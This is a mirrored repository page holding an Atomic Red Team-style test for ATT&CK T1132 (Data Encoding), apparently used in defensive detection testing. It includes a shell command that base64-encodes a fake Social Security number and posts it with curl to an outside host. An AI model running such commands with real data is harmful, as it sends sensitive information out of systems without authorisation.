valitydev/atomic-threat-coverage
14
0
Fork 0
mirror of https://github.com/valitydev/atomic-threat-coverage.git synced 2024-11-07 09:58:55 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f79f50bec3
atomic-threat-coverage/Atomic_Threat_Coverage/Triggers/T1132.md
yugoslavskiy f79f50bec3 changed directories names
2019-02-12 04:55:11 +01:00

1.2 KiB
Raw Blame History

T1132 - Data Encoding

Description from ATT&CK

Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

Atomic Tests


Atomic Test #1 - Base64 Encoded data.

Utilizing a common technique for posting base64 encoded data.

Supported Platforms: macOS, Linux

Inputs

Name Description Type Default Value
destination_url Destination URL to post encoded data. string redcanary.com
base64_data Encoded data to post using fake Social Security number 111-11-1111. string MTExLTExLTExMTE=

Run it with sh!

echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}